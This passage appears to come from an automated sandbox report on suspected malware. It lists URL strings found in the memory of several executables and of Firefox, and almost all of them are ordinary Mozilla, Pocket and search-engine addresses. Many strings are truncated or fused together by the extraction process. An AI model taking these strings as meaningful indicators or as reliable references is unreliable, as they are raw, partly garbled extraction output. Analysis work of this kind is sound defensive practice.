Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001A.00000002.3276626657.0000019E4CD52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001A.00000002.3230691472.0000019E47D8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: file.exe, 00000000.00000003.2199007383.0000000005BDA000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2926473817.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3090013500.0000000005FD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000003.2214880868.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2926473817.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 0000001A.00000002.3269450087.0000019E4C376000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B811000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C266000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureWebExtensionUncheckedLastErr
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarning
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C266000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C266000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: 7451ae0b11.exe, 0000000B.00000003.2960373733.0000000004BCB000.00000004.00001000.00020000.00000000.sdmp, 7451ae0b11.exe, 0000000B.00000002.3001129617.000000000016C000.00000040.00000001.01000000.0000000E.sdmp, num.exe, 00000025.00000000.3281198847.0000000000C1C000.00000008.00000001.01000000.0000001A.sdmp String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 0000001A.00000002.3257880743.0000019E4BF80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3095374123.0000019E4B76D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3086228555.0000019E4B852000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3084909437.0000019E4B600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3085359079.0000019E4B80F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://ebay.com
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://fb.me/react-polyfillsO
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://fb.me/react-polyfillsP
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://fb.me/react-polyfillsPO
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3165170400.0000019E4E0ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/74f06853-c80d-4afc-9b2
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/browser/components/newtab/content-src/asrouter/docs/debuggin
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001A.00000002.3273080593.0000019E4C950000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3257880743.0000019E4BF80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsm
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsmoz-e
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsmr
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/nimbus-desktop-experiments
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsi
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1i
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1i#
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3224109770.0000019E3B86B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3165170400.0000019E4E0ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3276626657.0000019E4CD8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3276626657.0000019E4CD8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://getpocket.com/
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://getpocket.com/a4
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://getpocket.com/collections
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://getpocket.com/explore/
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3276626657.0000019E4CD8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://getpocket.com/read/$
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3276626657.0000019E4CD8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001A.00000002.3236996781.0000019E48E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001A.00000003.3135984680.0000019E53E83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3200289786.0000019E53E84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3142796839.0000019E53E85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 0000001A.00000003.3135984680.0000019E53E83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3200289786.0000019E53E84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3142796839.0000019E53E85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001A.00000003.3084909437.0000019E4B600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3085359079.0000019E4B80F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://github.com/projectfluent/fluent.js/wiki/React-Overlays.
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://google.com
